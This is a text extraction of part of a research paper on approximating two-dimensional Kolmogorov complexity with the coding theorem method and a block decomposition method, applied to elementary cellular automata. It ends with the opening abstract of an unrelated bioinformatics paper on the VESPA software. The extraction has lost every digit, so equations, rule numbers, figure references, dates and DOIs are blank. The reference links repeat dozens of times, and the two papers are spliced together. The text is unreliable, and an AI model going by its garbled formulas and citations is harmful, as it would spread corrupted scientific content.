https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure scatterplots of compress versus km, d × on the first eca evolutions after t = steps. top: distribution of points along the axes displaying clusters of equivalent rules and a distribution corresponding to the known complexity of various cases. bottom: same plot but with some eca rules highlighted some of which were used in the side by side comparison in fig. (but unlike there, here for a single black cell initial condition). that rules distribute on the diagonal indicates that both methods are correlated as theoretically expected (even if lossless compression is a form of entropy rate up to the compression fixed maximum word length). zenil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. the anomalies found in the classification of elementary cellular automata (e.g., rule being placed among eca with high complexity according to km, d × ) is a limitation of km, d × itself and not of the coding theorem method which for d = is unable to “see” beyond -bit squares using, which is obviously very limited. and yet the degree of agreement with compressibility is surprising (as well as with intuition, as a glance at fig. shows, and as the distribution of ecas starting from random initial conditions in fig. confirms). in fact an average eca has a complexity of about k bits, which is quite a large program-size when compared to what we intuitively gauge to be the complexity of each eca, which may suggest that they should have smaller programs. however, one can think of d( , ) d × as attempting to reconstruct the evolution of each eca for the given number of steps with square arrays only bits in size, the complexity of the three square arrays adding up to approximate km, d of the eca rule. hence it is the deployment of d( , ) d × that takes between to k bits to reconstruct every eca space–time evolution depending on how random versus how simple it is. other ways to exploit the data from d( , ) d (e.g., non-square arrays) can be utilized to explore better classifications. we think that constructing a universal distribution from a larger set of turing machines, e.g., d( , ) d × will deliver more accurate results but here we will also introduce a tweak to the definition of the complexity of the evolution of a cellular automaton. splitting eca rules in array squares of size is like trying to look through little windows pixels wide one at a time in order to recognize a face, or training a “microscope” on a planet in the sky. one can do better with the coding theorem method by going further than we have in the calculation of a -dimensional universal distribution (e.g., calculating in full or a sample of d( , ) d × ), but eventually how far this process can be taken is dictated by the computational resources at hand. nevertheless, one should use a telescope where telescopes are needed and a microscope where microscopes are needed. block decomposition method one can think of an improvement in resolution of km, d(c) for growing space–time diagrams of cellular automaton by taking the log (n) of the sum of the arrays where n is the number of repeated arrays, instead of simply adding the complexity of the image patches or arrays. that is, one penalizes repetition to improve the resolution of km, d for larger images as a sort of “optical lens”. this is possible because we know that the kolmogorov complexity of repeated objects grows by log (n), just as we explained with an example in ‘kolmogorov–chaitin complexity’. adding the complexity approximation of each array in the partition matrix of a space–time diagram of an eca provides an upper bound on the eca kolmogorov complexity, as it shows that there is a program that generates the eca evolution picture with the length equal to the sum of the programs generating all the sub-arrays (plus a small value corresponding to the code length to join the sub-arrays). so if a sub-array occurs n times we do not need to consider its complexity n times but log (n). taking into account this, eq. ( ) can be then rewritten as: k′m, dd×d (c t ) =  (ru,nu)∈{ct }d×d km(ru) + log (nu) ( ) zenil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. where ru are the different square arrays in the partition {c t }d×d of the matrix c t and nu the multiplicity of ru, that is the number of repetitions of d × d-length patches or square arrays found in ct . from now on we will use k′ for squares of size greater than and it may be denoted only by k or by bdm standing for block decomposition method. bdm has now been applied successfully to measure, for example, the kolmogorov complexity of graphs and complex networks (zenil et al., ) by way of their adjacency matrices (a d grid) and was shown to be consistent with labelled and unlabelled (up to isomorphisms) graphs. now complexity values of k′m, dd×d range between and k bits with a mean program-size value of about k bits. the classification of eca, according to eq. ( ), is presented in fig. . there is an almost perfect agreement with a classification by lossless compression length (see fig. ) which makes even one wonder whether the coding theorem method is actually providing more accurate approximations to kolmogorov complexity than lossless compressibility for this objects length. notice that the same procedure can be extended for its use on arbitrary images. we denominate this technique block decomposition method. we think it will prove to be useful in various areas, including machine learning as an of kolmogorov complexity (other contributions to ml inspired in kolmogorov complexity can be found in hutter ( )). also worth notice that the fact that eca can be successfully classified by km, d with an approximation of the universal distribution calculated from turing machines (tm) suggests that output frequency distributions of eca and tm cannot be but strongly correlated, something that we had found and reported before in zenil & delahaye ( ) and delahaye & zenil ( b). another variation of the same km, d measure is to divide the original image into all possible square arrays of a given length rather than taking a partition. this would, however, be exponentially more expensive than the partition process alone, and given the results in fig. further variations do not seem to be needed, at least not for this case. robustness of the approximations to m(s) one important question that arises when positing the soundness of the coding theorem method as an alternative to having to pick a universal turing machine to evaluate the kolmogorov complexity k of an object, is how many arbitrary choices are made in the process of following one or another method and how important they are. one of the motivations of the coding theorem method is to deal with the constant involved in the invariance theorem (eq. ( )), which depends on the (prefix-free) universal turing machine chosen to measure k and which has such an impact on real-world applications involving short strings. while the constant involved remains, given that after application of the coding theorem (eq. ( )) we reintroduce the constant in the calculation of k , a legitimate question to ask is what difference it makes to follow the coding theorem method compared to simply picking the universal turing machine. on the one hand, one has to bear in mind that no other method existed for approx- imating the kolmogorov complexity of short strings. on the other hand, we have tried to minimize any arbitrary choice, from the formalism of the computing model to the zenil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure block decomposition method. all the first ecas (the other are – reverted rules) starting from the simplest (black cell) initial configuration running for t = steps, sorted from lowest to highest complexity according to klog as defined in eq. ( ). zenil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure top: block decomposing (other boundary conditions are possible and under investigation) the evolution of rule (top) eca after t = steps into subarrays of length × (bottom) in order to calculate km, d × to approximate its kolmogorov complexity. bottom: side by side comparison of evolutions of representative ecas, starting from a random initial configuration, sorted from lowest to highest bdm values (top) and smallest to largest compression lengths using the deflate algorithm as a method to approximate kolmogorov complexity (zenil, ). zenil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. informed runtime, when no busy beaver values are known and therefore sampling the space using an educated runtime cut-off is called for. when no busy beaver values are known the chosen runtime is determined according to the number of machines that we are ready to miss (e.g., less than . %) for our sample to be significative enough as described in ‘setting the runtime’. we have also shown in soler-toscano et al. ( ) that approximations to the universal distribution from spaces for which busy beaver values are known are in agreement with larger spaces for which busy beaver values are not known. among the possible arbitrary choices it is the enumeration that may perhaps be questioned, that is, calculating d(n) for increasing n (number of turing machine states), hence by increasing size of computer programs (turing machines). on the one hand, one way to avoid having to make a decision on the machines to consider when calculating a universal distribution is to cover all of them for a given number of n states and m symbols, which is what we have done (hence the enumeration in a thoroughly (n,m) space becomes irrelevant). while it may be an arbitrary choice to fix n and m, the formalisms we have followed guarantee that n-state m-symbol turing machines are in (n + i,m + j) with i,j ≥ (that is, the space of all n + i-state m + j-symbol turing machines). hence the process is incremental, taking larger spaces and constructing an average universal distribution. in fact, we have demonstrated (soler-toscano et al., ) that d( ) (that is, the universal distribution produced by the turing machines with symbols and states) is strongly correlated to d( ) and represents an improvement in accuracy of the string complexity values in d( ), which in turn is in agreement with and an improvement on d( ) and so on. we have also estimated the constant c involved in the invariance theorem (eq. ( )) between these d(n) for n > , which turned out to be very small in comparison to all the other calculated universal distributions (soler-toscano et al., ). real-world evidence we have provided here some theoretical and statistical arguments to show the reliability, validity and generality of our measure, more empirical evidence has also been produced, in particular in the field of cognition and psychology where researchers often have to deal with too short strings or too small patterns for compression methods to be used. for instance, it was found that the complexity of a (one-dimensional) string better predicts its recall from short-term memory that the length of the string (chekaf et al., ). incidentally, a study on the conspiracy theory believers mindset also revealed that human perception of randomness is highly linked to our one-dimensional measure of complex- ity (dieguez, wagner-egger & gauvrit, ). concerning the two-dimensional version introduced in this paper, it has been fruitfully used to show how language iterative learning triggers the emergence of linguistic structures (kempe, gauvrit & forsyth, ). a direct link between the perception of two-dimensional randomness, our complexity measure, and natural statistics was also established in two experiments (gauvrit, soler-toscano & zenil, ). these findings further support the complexity metrics presented herein. furthermore, more theoretical arguments have been advanced in soler-toscano et al. ( ) and soler-toscano & zenil ( ). zenil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. conclusions we have shown how a highly symmetric but algorithmic process is capable of generating a full range of patterns of different structural complexity. we have introduced this technique as a natural and objective measure of complexity for n-dimensional objects. with two different experiments we have demonstrated that the measure is compatible with lossless compression estimations of kolmogorov complexity, yielding similar results but providing an alternative particularly for short strings. we have also shown that km, d (and km) are ready for applications, and that calculating universal distributions is a stable alternative to compression and a potential useful tool for approximating the kolmogorov complexity of objects, strings and images (arrays). we think this method will prove to do the same for a wide range of areas where compression is not an option given the size of strings involved. we also introduced the block decomposition method. as we have seen with anomalies in the classification such as eca rule (see fig. ), when approaching the complexity of the space–time diagrams of eca by splitting them in square arrays of size , the coding theorem method does have its limitations, especially because it is computationally very expensive (although the most expensive part needs to be done only once—that is, producing an approximation of the universal distribution). like other high precision instruments for examining the tiniest objects in our world, measuring the smallest complexities is very expensive, just as the compression method can also be very expensive for large amounts of data. we have shown that the method is stable in the face of the changes in turing machine formalism that we have undertaken (in this case turmites) as compared to, for example, traditional -dimensional turing machines or to strict integer value program-size com- plexity (soler-toscano et al., ) as a way to estimate the error of the numerical estima- tions of kolmogorov complexity through algorithmic probability. for the turing machine model we have now changed the number of states, the number of symbols and now even the movement of the head and its support (grid versus tape). we have shown and reported here and in soler-toscano et al. ( ) and soler-toscano et al. ( ) that all these changes yield distributions that are strongly correlated with each other up to the point to assert that all these parameters have marginal impact in the final distributions suggesting a fast rate of convergence in values that reduce the concern of the constant involved in the invariance theorem. in zenil & delahaye ( ) we also proposed a way to compare approximations to the universal distribution by completely different computational models (e.g., post tag systems and cellular automata), showing that for the studied cases reasonable estimations with different degrees of correlations were produced. the fact that we classify elementary cellular automata (eca) as shown in this paper, with the output distribution of turmites with results that fully agree with lossless compressibility, can be seen as evidence of agree- ment in the face of a radical change of computational model that preserves the apparent order and randomness of turmites in eca and of eca in turmites, which in turn are in full agreement with -dimensional turing machines and with lossless compressibility. we have made available to the community this “microscope” to look at the space of bit strings and other objects in the form of the online algorithmic complexity calculator zenil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. (http://www.complexitycalculator.com) implementing km (in the future it will also implement km, d and many other objects and a wider range of methods) that provides objective algorithmic probability and kolmogorov complexity estimations for short binary strings using the method described herein. raw data and the computer programs to reproduce the results for this paper can also be found under the publications section of the algorithmic nature group (http://www.algorithmicnature.org). additional information and declarations funding the foundational questions institute (fqxi) (fqxi-mga- ) provided support (hz). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: foundational questions institute (fqxi): fqxi-mga- . competing interests the authors declare there are no competing interests. author contributions • hector zenil conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • fernando soler-toscano conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • jean-paul delahaye conceived and designed the experiments, contributed reagents/materials/analysis tools, reviewed drafts of the paper. • nicolas gauvrit analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information. references andrienko yua, brilliantov nv, kurths j. . complexity of two-dimensional patterns. the european physical journal b—condensed matter and complex systems : – doi . /s . calude cs. . information and randomness. st edition. heidelberg: springer. zenil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /s http://dx.doi.org/ . /peerj-cs. casali ag, gosseries o, rosanova m, boly m, sarasso s, casali kr, casarotto s, bruno m, laureys s, tononi g, massimini m. . a theoretically based index of consciousness independent of sensory processing and behavior. science translational medicine ( ): ra doi . /scitranslmed. . chaitin gj. . on the length of programs for computing finite binary sequences: statistical considerations. journal of the acm ( ): – doi . / . . chekaf m, gauvrit n, guida a, mathy f. . chunking in working memory and its relationship to intelligence. in: proceedings of the th annual meeting of the cognitive science society, pasadena, california. cilibrasi r, vitanyi p. . clustering by compression. ieee transactions on information theory ( ): – doi . /tit. . . cook m. . universality in elementary cellular automata. complex systems : – . cover tm, thomas ja. . information theory. nd edition. new jersey: j. wiley and sons. delahaye j-p, zenil h. a. towards a stable definition of kolmogorov–chaitin complexity. arxiv preprint. arxiv: . . delahaye j-p, zenil h. b. on the kolmogorov–chaitin complexity for short sequences. in: calude c, ed. randomness and complexity: from leibniz to chaitin. singapore: world scientific. delahaye j-p, zenil h. . numerical evaluation of the complexity of short strings: a glance into the innermost structure of algorithmic randomness. applied mathematics and computation : – doi . /j.amc. . . . dieguez s, wagner-egger p, gauvrit n. . “nothing happens by accident”, or does it? a low prior for randomness does not explain belief in conspiracy theories. psychological science doi . / . feldman dp. . some foundations in complex systems: entropy, information, computation, and complexity. beijing: santa fe institute’s annual complex systems summer school. feldman dp, crutchfield jp. . structural information in two-dimensional patterns: entropy convergence and excess entropy. physical review e : doi . /phys- reve. . . gardner m. . mathematical games—the fantastic combinations of john conway’s new solitaire game “life”. scientific american : – doi . /scientificamerican - . gauvrit n, soler-toscano f, zenil h. . natural scene statistics mediate the perception of image complexity. visual cognition ( ): – doi . / . . . hutter m. . on the existence and convergence of computable universal priors. in: proc. th internat. conf. on algorithmic learning theory (alt- ), lecture notes on artificial intelligence, vol. . berlin: sapporo, springer, – . joosten j. . turing machine enumeration: nks versus lexicographical. wol- fram demonstrations project. available at http://demonstrations.wolfram.com/ turingmachineenumerationnksversuslexicographical/. kempe v, gauvrit n, forsyth d. . structure emerges faster during cultural transmission in children than in adults. cognition : – doi . /j.cognition. . . . kircher w, li m, vitanyi p. . the miraculous universal distribution. the mathematical intelligencer ( ): – doi . /bf . kolmogorov an. . three approaches to the quantitative definition of information. problems of information and transmission ( ): – . zenil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /scitranslmed. http://dx.doi.org/ . / . http://dx.doi.org/ . /tit. . http://arxiv.org/abs/ . http://dx.doi.org/ . /j.amc. . . http://dx.doi.org/ . / http://dx.doi.org/ . /physreve. . http://dx.doi.org/ . /physreve. . http://dx.doi.org/ . /scientificamerican - http://dx.doi.org/ . / . . http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://demonstrations.wolfram.com/turingmachineenumerationnksversuslexicographical/ http://dx.doi.org/ . /j.cognition. . . http://dx.doi.org/ . /bf http://dx.doi.org/ . /peerj-cs. langton cg. . studying artificial life with cellular automata. physica d: nonlinear phenomena ( – ): – doi . / - ( ) -x. levin l. . laws of information conservation (non-growth) and aspects of the foundation of probability theory. problems of information and transmission : – . li m, vitányi p. . an introduction to kolmogorov complexity and its applications. rd edition. heildelberg: springer. pegg jr ed. . math puzzle. available at http://www.mathpuzzle.com/ mar .html (accessed june ). radó t. . on non-computable functions. bell system technical journal ( ): – doi . /j. - . .tb .x. rivals é, dauchet m, delahaye j-p, delgrange o. . compression and genetic sequence analysis. biochimie : – doi . / - ( ) - . shalizi cr, shalizi kl, haslinger r. . quantifying self-organization with optimal predictors. physical review letters : doi . /physrevlett. . . soler-toscano f, zenil h. . a computable measure of algorithmic probability by finite approximations. arxiv preprint. arxiv: . . soler-toscano f, zenil h, delahaye j-p, gauvrit n. . correspondence and independence of numerical evaluations of algorithmic information measures. computability ( ): – . soler-toscano f, zenil h, delahaye j-p, gauvrit n. . calculating kolmogorov complexity from the frequency output distributions of small turing machines. plos one ( ):e doi . /journal.pone. . solomonoff rj. . a formal theory of inductive inference: parts and . information and control : – ; – doi . /s - ( ) - . wolfram s. . a new kind of science. champaign: wolfram media. young k, du a-t, kramer j, rosen h, miller b, weiner m, schuff n. . patterns of structural complexity in alzheimer’s disease and frontotemporal dementia. human brain mapping ( ): – doi . /hbm. . young k, schuff n. . measuring structural complexity in brain images. neuroimage ( ): – doi . /j.neuroimage. . . . zenil h. . compression-based investigation of the dynamical properties of cellular automata and other systems. complex systems ( ): – . zenil h. . une approche expérimentale à la théorie algorithmique de la complexité, dissertation in fulfilment of the degree of doctor in computer science, université de lille . zenil h, delahaye j-p. . on the algorithmic nature of the world. in: dodig-crnkovic g, burgin m, eds. information and computation. singapore: world scientific publishing company. zenil h, kiani n, tegnér j. a probabilistic algorithmic information approach to quantify loss of information of network-based dimensionality reduction techniques. journal of complex networks in press. zenil h, soler-toscano f, dingle k, louis a. . correlation of automorphism group size and topological properties with program-size complexity evaluations of graphs and complex networks. physica a: statistical mechanics and its applications : – doi . /j.physa. . . . zenil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . / - ( ) -x http://www.mathpuzzle.com/ mar .html http://www.mathpuzzle.com/ mar .html http://www.mathpuzzle.com/ mar .html http://www.mathpuzzle.com/ mar .html http://www.mathpuzzle.com/ mar .html http://www.mathpuzzle.com/ mar .html http://www.mathpuzzle.com/ mar .html http://www.mathpuzzle.com/ mar .html http://www.mathpuzzle.com/ mar .html http://www.mathpuzzle.com/ mar .html http://www.mathpuzzle.com/ mar .html http://www.mathpuzzle.com/ mar .html http://www.mathpuzzle.com/ mar .html http://www.mathpuzzle.com/ mar .html http://www.mathpuzzle.com/ mar .html http://www.mathpuzzle.com/ mar .html http://www.mathpuzzle.com/ mar .html http://www.mathpuzzle.com/ mar .html http://www.mathpuzzle.com/ mar .html http://www.mathpuzzle.com/ mar .html http://www.mathpuzzle.com/ mar .html http://www.mathpuzzle.com/ mar .html http://www.mathpuzzle.com/ mar .html http://www.mathpuzzle.com/ mar .html http://www.mathpuzzle.com/ mar .html http://www.mathpuzzle.com/ mar .html http://www.mathpuzzle.com/ mar .html http://www.mathpuzzle.com/ mar .html http://www.mathpuzzle.com/ mar .html http://www.mathpuzzle.com/ mar .html http://www.mathpuzzle.com/ mar .html http://www.mathpuzzle.com/ mar .html http://www.mathpuzzle.com/ mar .html http://www.mathpuzzle.com/ mar .html http://www.mathpuzzle.com/ mar .html http://www.mathpuzzle.com/ mar .html http://www.mathpuzzle.com/ mar .html http://www.mathpuzzle.com/ mar .html http://dx.doi.org/ . /j. - . .tb .x http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . /physrevlett. . http://arxiv.org/abs/ . http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /hbm. http://dx.doi.org/ . /j.neuroimage. . . http://dx.doi.org/ . /j.physa. . . http://dx.doi.org/ . /peerj-cs. two-dimensional kolmogorov complexity and an empirical validation of the coding theorem method by compressibility introduction kolmogorov--chaitin complexity uncomputability and instability of k solomonoff--levin algorithmic probability the coding theorem method deterministic -dimensional turing machines (turmites) an approximation to the universal distribution setting the runtime output analysis evaluating -dimensional kolmogorov complexity validation of the coding theorem method by compressibility comparison of km and approaches based on compression comparison of km and compression of cellular automata km, d comparison with compressed eca evolutions robustness of the approximations to m(s) real-world evidence conclusions references submitted march accepted may published june corresponding author mary j. o’connell, m.oconnell@leeds.ac.uk academic editor james procter additional information and declarations can be found on page doi . /peerj-cs. copyright webb et al. distributed under creative commons cc-by . open access vespa: very large-scale evolutionary and selective pressure analyses andrew e. webb , thomas a. walsh and mary j. o’connell , bioinformatics and molecular evolution group, school of biotechnology, faculty of science and health, dublin city university, dublin, ireland computational and molecular evolutionary biology group, school of biology, faculty of biological sciences, the university of leeds, leeds, united kingdom abstract background. large-scale molecular evolutionary analyses of protein coding sequences requires a number of preparatory inter-related steps from finding gene families, to generating alignments and phylogenetic trees and assessing selective pressure variation. each phase of these analyses can represent significant challenges, particularly when working with entire proteomes (all protein coding sequences in a genome) from a large number of species. methods. we present vespa, software capable of automating a selective pressure analysis using codeml in addition to the preparatory analyses and summary statistics. vespa is written in python and perl and is designed to run within a unix environment. results. we have benchmarked vespa and our results show that the method is consistent, performs well on both large scale and smaller scale datasets, and produces results in line with previously published datasets. discussion. large-scale gene family identification, sequence alignment, and phylogeny reconstruction are all important aspects of large-scale molecular evolutionary analyses. vespa provides flexible software for simplifying these processes along with down- stream selective pressure variation analyses. the software automatically interprets results from codeml and produces simplified summary files to assist the user in better 